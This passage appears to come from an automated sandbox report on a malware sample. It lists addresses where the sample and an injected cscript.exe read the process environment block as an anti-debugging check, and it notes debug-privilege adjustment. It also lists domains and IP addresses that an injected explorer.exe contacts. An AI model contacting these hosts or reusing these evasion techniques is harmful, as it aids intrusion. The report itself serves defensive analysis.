          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B6E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B5F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C08F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BCFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BCFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B6A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B6A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B4FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B4EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B18CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A6746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ADC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ADC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A71DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A71DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A71DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A72581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A72581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A72581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A72581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A42D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A42D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A42D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A42D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A42D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AF8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B18D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B0E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A4AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ACA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A74D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A74D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A74D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A6C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A6C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A83D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AF3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A67D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ADFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B18ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AFFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A88EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A4E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AFFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A4C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A4C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A4C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A78E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A6AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A6AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A6AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A6AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A6AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B0AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B0AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A58794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A837F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A44F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A44F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A6F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ADFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ADFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B18F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A49080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A440E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A440E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A440E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A458EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ADB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B14015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B14015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B02073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B11074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A60050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A60050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AC51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A6C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A72990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AD41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A64120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A64120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A64120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A64120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A64120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A49100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A49100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A49100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.aksharnewtown.com
          Source: C:\Windows\explorer.exeDomain query: www.stacksyspro.net
          Source: C:\Windows\explorer.exeDomain query: www.th0rgramm.com
          Source: C:\Windows\explorer.exeDomain query: www.yakudatsu-hikaku.com
          Source: C:\Windows\explorer.exeDomain query: www.xn--ol-xia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.95.215 80
          Source: C:\Windows\explorer.exeNetwork Connect: 91.236.136.12 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.198 80
          Source: C:\Windows\explorer.exeDomain query: www.investmentpartners.limited
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.50.167 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.86.176.10 80
          Source: C:\Windows\explorer.exeDomain query: www.rainbowsdepot.com
          Source: C:\Windows\explorer.exeDomain query: www.tonton-koubou.com
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.185.226 80
          Source: C:\Windows\explorer.exeDomain query: www.recovatek.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.37.16 80
          Source: C:\Windows\explorer.exeDomain query: www.jabberjawmobile.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
